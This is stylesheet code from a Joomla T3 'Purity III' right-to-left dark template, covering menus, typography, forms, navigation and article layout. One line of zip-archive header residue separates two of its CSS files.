  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    right: 0 !important;
    margin-right: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .t3-megamenu .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    right: auto;
    left: 0 !important;
    margin-left: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 10px 0;
}
.t3-megamenu .row {
  margin-right: auto;
  margin-left: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #2d2d2d;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-right: -15px;
  margin-left: -15px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 0;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: none;
  color: inherit;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #5a5a5a;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}

html[dir="rtl"] .t3-megamenu .mega-align-center > .dropdown-menu {
  -webkit-transform: translate(50%, 0);
  -ms-transform: translate(50%, 0);
  transform: translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu .mega-nav .dropdown-submenu > a:after {
  direction: ltr;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
  -webkit-transform-origin: 80% 20%;
  -moz-transform-origin: 80% 20%;
  transform-origin: 80% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
  -webkit-transform: scale(0, 0) translate(50%, 0);
  -ms-transform: scale(0, 0) translate(50%, 0);
  transform: scale(0, 0) translate(50%, 0);
  -webkit-transform-origin: 100% 20%;
  -moz-transform-origin: 100% 20%;
  transform-origin: 100% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
  transform: scale(1, 1) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
  transform: scale(1, 0) translate(50%, 0);
  -webkit-transform: scale(1, 0) translate(50%, 0);
  -ms-transform: scale(1, 0) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
  transform: scale(1, 1) translate(50%, 0);
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
}
PKӜ�\O��o�o�$purity_iii/css/rtl/dark/template.cssnu&1i�

@media (max-width: 768px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: right;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("https://static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}

input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ffffff;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #d9d9d9;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.428571429;
  text-align: right;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #2d2d2d;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16.1px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 768px) {
  .lead {
    font-size: 21px;
  }
}
small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #5a5a5a;
}
.text-primary {
  color: #0077bb;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: right;
}
.text-right {
  text-align: left;
}
.text-center {
  text-align: center;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: #ffffff;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #5a5a5a;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 36px;
}
h2,
.h2 {
  font-size: 30px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-right: 0;
  list-style: none;
}
.list-inline {
  padding-right: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-right: 5px;
  padding-left: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.428571429;
}
dt {
  font-weight: bold;
}
dd {
  margin-right: 0;
}
@media (min-width: 768px) {
  .dl-horizontal dt {
    float: right;
    width: 160px;
    clear: right;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-right: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    content: " ";
    display: table;
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #5a5a5a;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-right: 5px solid #878787;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.25;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.428571429;
  color: #5a5a5a;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-left: 15px;
  padding-right: 0;
  border-left: 5px solid #878787;
  border-right: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: left;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.428571429;
}
code,
kbd,
pre,
samp {
  font-family: Monaco, Menlo, Consolas, "Courier New", monospace;
}
.btn-actions {
  text-align: center;
}
.features-list {
  margin-top: 60px;
  

}
.features-list .page-header {
  border: 0;
  text-align: center;
}
.features-list .page-header h1 {
  font-size: 46px;
}
.features-list .feature-row {
  overflow: hidden;
  min-height: 200px;
  color: #696f72;
  border-top: 1px solid #e0e2e3;
  padding: 60px 0 0;
  text-align: center;
}
.features-list .feature-row:last-child {
  border-bottom: 1px solid #e0e2e3;
  margin-bottom: 60px;
}
.features-list .feature-row h3 {
  font-size: 28px;
}
.features-list .feature-row div:first-child {
  padding-right: 0;
}
.features-list .feature-row div:last-child {
  padding-left: 0;
}
.features-list .feature-row div:first-child.feature-img img {
  float: right;
}
.features-list .feature-row div:last-child.feature-img img {
  float: left;
}
.jumbotron h2 {
  font-size: 46px;
}
.jumbotron iframe {
  margin-top: 20px;
}

.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control:-moz-placeholder {
  color: #5a5a5a;
}
.form-control::-moz-placeholder {
  color: #5a5a5a;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #5a5a5a;
}
.form-control::-webkit-input-placeholder {
  color: #5a5a5a;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
select:-moz-placeholder,
textarea:-moz-placeholder,
input[type="text"]:-moz-placeholder,
input[type="password"]:-moz-placeholder,
input[type="datetime"]:-moz-placeholder,
input[type="datetime-local"]:-moz-placeholder,
input[type="date"]:-moz-placeholder,
input[type="month"]:-moz-placeholder,
input[type="time"]:-moz-placeholder,
input[type="week"]:-moz-placeholder,
input[type="number"]:-moz-placeholder,
input[type="email"]:-moz-placeholder,
input[type="url"]:-moz-placeholder,
input[type="search"]:-moz-placeholder,
input[type="tel"]:-moz-placeholder,
input[type="color"]:-moz-placeholder,
.inputbox:-moz-placeholder {
  color: #5a5a5a;
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #5a5a5a;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #5a5a5a;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #5a5a5a;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #bbff33;
  border-color: #669900;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.dropdown-menu > li > a {
  padding: 5px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #5a5a5a;
}
.dropdown-submenu > a:after {
  border-right-color: #000000;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 768px) {
  .nav > li > .separator {
    padding-top: 15px;
    padding-bottom: 15px;
  }
}
.nav .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.nav a:hover .caret {
  border-top-color: #d9d9d9;
  border-bottom-color: #d9d9d9;
}
.t3-navhelper {
  background: #2d2d2d;
  border-top: 1px solid #2d2d2d;
  color: #4b4b4b;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-right: 0;
  padding-left: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #ffffff;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  content: " ";
  display: table;
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: right;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #2d2d2d;
  border: 1px solid #1f1f1f;
  border-radius: 4px;
}
@media screen and (min-width: 768px) {
  .counter {
    float: left;
  }
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}

.navbar-toggle {
  padding: 0;
  height: 35px;
  line-height: 35px;
  width: 35px;
  margin-right: 15px;
}
@media (min-width: 768px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 7.5px -15px;
}
@media (max-width: 767px) {
  
}
@media (min-width: 768px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #2d2d2d;
  border-color: #1f1f1f;
}
.navbar-default .navbar-brand {
  color: #5a5a5a;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #878787;
}
.navbar-default .navbar-nav > li > a {
  color: #878787;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #333333;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #cccccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #1f1f1f;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #878787;
  border-bottom-color: #878787;
}
@media (max-width: 767px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #878787;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #878787;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border-right: 0;
  border-left: 0;
  margin-bottom: 0;
  border-radius: 0;
}
.t3-mainnav .t3-navbar {
  padding-right: 0;
  padding-left: 0;
}
@media (min-width: 768px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -15px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-left: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #1f1f1f;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  left: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  content: " ";
  display: table;
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-right: 20px;
  padding-right: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-right: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-right: 0;
  margin-right: 0;
}
.module_menu .nav > li > a,
.module_menu .nav > li > .separator {
  padding: 6px 5px;
  display: block;
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form ul.unstyled {
  margin-top: 20px;
  padding-right: 20px;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #2d2d2d;
  font-size: 12px;
  padding-top: 10px;
  text-align: left;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px solid #2d2d2d;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4 {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #2d2d2d;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-right: 0;
}
.latestusers li,
ul.latestusers li {
  background: #878787;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 4px;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  color: #4b4b4b;
  display: inline-block;
  margin: 0 0 5px 5px;
}
.tagspopular ul > li > a {
  background: #878787;
  border-radius: 3px;
  color: #4b4b4b;
  display: block;
  padding: 2px 5px;
}
.tagspopular ul > li > a:hover,
.tagspopular ul > li > a:focus,
.tagspopular ul > li > a:active {
  background: #d9d9d9;
  color: #ffffff;
  text-decoration: none;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #878787;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #4b4b4b;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #d9d9d9;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-right: 0;
}

.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 0 0 40px;
  border: 0;
  border-top: 1px solid #2d2d2d;
}
.article-aside {
  color: #5a5a5a;
  font-size: 13px;
  margin-bottom: 20px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-right: 0;
  margin-left: 10px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: bold;
}
.article-footer {
  color: #5a5a5a;
  font-size: 12px;
  margin-bottom: 20px;
}
.article-intro img,
.article-content img {
  display: block;
  max-width: 100%;
  height: auto;
}
.article-intro img[align=left],
.article-content img[align=left],
.article-intro .img_caption.left,
.article-content .img_caption.left,
.article-intro .pull-left.item-image,
.article-content .pull-left.item-image {
  margin: 0 0 20px 20px;
}
.article-intro img[align=right],
.article-content img[align=right],
.article-intro .img_caption.right,
.article-content .img_caption.right,
.article-intro .pull-right.item-image,
.article-content .pull-right.item-image {
  margin: 0 20px 20px 0;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: right;
  margin-left: 20px;
}
.img-fulltext-right {
  float: left;
  margin-right: 20px;
}
.img-intro-none img,
.img-intro-left img,
.img-intro-right img,
.img-fulltext-none img,
.img-fulltext-left img,
.img-fulltext-right img {
  margin: 0;
}
.img_caption img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #878787;
  color: #4b4b4b;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
@media screen and (max-width: 767px) {
  article img[align=left],
  .img_caption.left,
  article img[align=right],
  .img_caption.right,
  .img-fulltext-left,
  .img-fulltext-right {
    float: none !important;
    margin-right: 0;
    margin-left: 0;
    width: 100% !important;
  }
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-right: 2px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-right: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: right;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-right: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
